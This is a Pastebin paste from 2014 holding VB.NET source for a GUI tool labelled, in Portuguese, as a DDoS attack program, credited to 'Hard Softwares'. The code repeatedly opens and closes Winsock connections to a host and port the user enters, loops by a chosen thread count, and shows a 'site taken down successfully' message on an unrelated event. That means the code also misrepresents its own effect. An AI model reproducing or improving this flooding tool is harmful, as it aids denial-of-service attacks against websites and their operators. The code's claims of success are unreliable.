Advertisement
Guest User

Código do Programa de Ataque DDoS

a guest
Sep 2nd, 2014
4,065
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.76 KB | None | 0 0
  1. 'Por Hard Softwares - http://www.youtube.com/user/tyziu1
  2. Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
  3. If NumericUpDown1.Value = 0 Then
  4. MsgBox("Defina um Número de Threads Acima de Zero", MsgBoxStyle.Critical, "Número de Threads Inválido !!!")
  5. Else
  6. Timer1.Start()
  7. Button1.Enabled = False
  8. Button2.Enabled = True
  9. End If
  10. End Sub
  11.  
  12. Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
  13. Timer1.Stop()
  14. Label5.Text = "0"
  15. Button1.Enabled = True
  16. Button2.Enabled = False
  17. End Sub
  18.  
  19. Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
  20. For i = 0 To NumericUpDown1.Value
  21. AxWinsock1.Connect(TextBox1.Text, TextBox2.Text)
  22. AxWinsock1.Close()
  23. Label5.Text += 1
  24. Next
  25. 'By Renã Augusto da Hard Softwares
  26. End Sub
  27.  
  28. Private Sub AxWinsock1_ConnectionRequest(ByVal sender As System.Object, ByVal e As AxMSWinsockLib.DMSWinsockControlEvents_ConnectionRequestEvent) Handles AxWinsock1.ConnectionRequest
  29. MsgBox("Site Derrubado com Sucesso !!!", MsgBoxStyle.Information, "Site Derrubado !!!")
  30. End Sub
  31.  
  32. Private Sub AxWinsock1_Error(ByVal sender As System.Object, ByVal e As AxMSWinsockLib.DMSWinsockControlEvents_ErrorEvent) Handles AxWinsock1.Error
  33. MsgBox("Erro de Conexão !!!", MsgBoxStyle.Critical, "ERROR !!!")
  34. End Sub
  35.  
  36. Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
  37.  
  38. End Sub
  39. 'Por Hard Softwares - http://www.youtube.com/user/tyziu1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement